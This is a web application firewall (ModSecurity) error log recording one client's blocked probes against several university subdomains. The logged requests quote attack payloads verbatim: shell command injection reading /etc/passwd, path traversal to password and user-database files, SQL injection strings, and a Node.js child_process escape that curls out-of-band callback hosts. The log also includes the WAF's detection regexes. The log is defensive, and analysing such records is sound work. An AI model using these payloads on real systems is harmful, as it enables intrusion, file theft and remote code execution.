[Tue Aug 29 11:33:19.319722 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARpgxMAAAAU"]
[Tue Aug 29 11:33:19.321093 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARzXwcAAAAd"]
[Tue Aug 29 11:33:19.322220 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARt-8MAAAAV"]
[Tue Aug 29 11:33:19.323639 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARTENUAAAAG"]
[Tue Aug 29 11:33:19.338633 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARxOpoAAAAa"]
[Tue Aug 29 11:33:19.341109 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARt-8QAAAAV"]
[Tue Aug 29 11:33:19.343791 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARTENYAAAAG"]
[Tue Aug 29 11:33:19.356832 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARA7fQAAAAA"]
[Tue Aug 29 11:33:20.318434 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EMCo-f0AAARu2qsAAAAW"]
[Tue Aug 29 11:33:20.323455 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARnmIUAAAAR"]
[Tue Aug 29 11:33:20.330840 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAANsAd4AAAAD"]
[Tue Aug 29 11:33:20.331024 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARxOp4AAAAa"]
[Tue Aug 29 11:33:20.357897 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARTENsAAAAG"]
[Tue Aug 29 11:33:20.359825 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11EMCo-f0AAARu2q0AAAAW"]
[Tue Aug 29 11:33:20.375494 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARA7fkAAAAA"]
[Tue Aug 29 11:33:21.305420 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARfwj0AAAAI"]
[Tue Aug 29 11:33:21.311783 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARiDlkAAAAJ"]
[Tue Aug 29 11:33:21.311946 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARpgxkAAAAU"]
[Tue Aug 29 11:33:21.318073 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARR29IAAAAF"]
[Tue Aug 29 11:33:21.320255 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EcCo-f0AAANsAeMAAAAD"]
[Tue Aug 29 11:33:21.332520 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgie7y6364j1p1q.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EcCo-f0AAARA7fwAAAAA"]
[Tue Aug 29 11:33:21.339807 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARu2rEAAAAW"]
[Tue Aug 29 11:33:22.300623 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgfwgptow9xoadt.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARfwkEAAAAI"]
[Tue Aug 29 11:33:22.304727 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgtg7ea7mjr5n4y.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARNk@AAAAAS"]
[Tue Aug 29 11:33:22.327022 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgd6y6ophzberrn.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARiDlwAAAAJ"]
[Tue Aug 29 11:33:22.391302 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgqjzdycdjz8xhn.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARpgx8AAAAU"]
[Tue Aug 29 11:33:22.421158 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgj4e5fm73f11xt.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARNk@UAAAAS"]
[Tue Aug 29 11:33:22.429062 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARiDmAAAAAJ"]
[Tue Aug 29 11:33:22.432744 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARpgyEAAAAU"]
[Tue Aug 29 11:33:22.436609 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARR29kAAAAF"]
[Tue Aug 29 11:33:22.442332 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARNk@YAAAAS"]
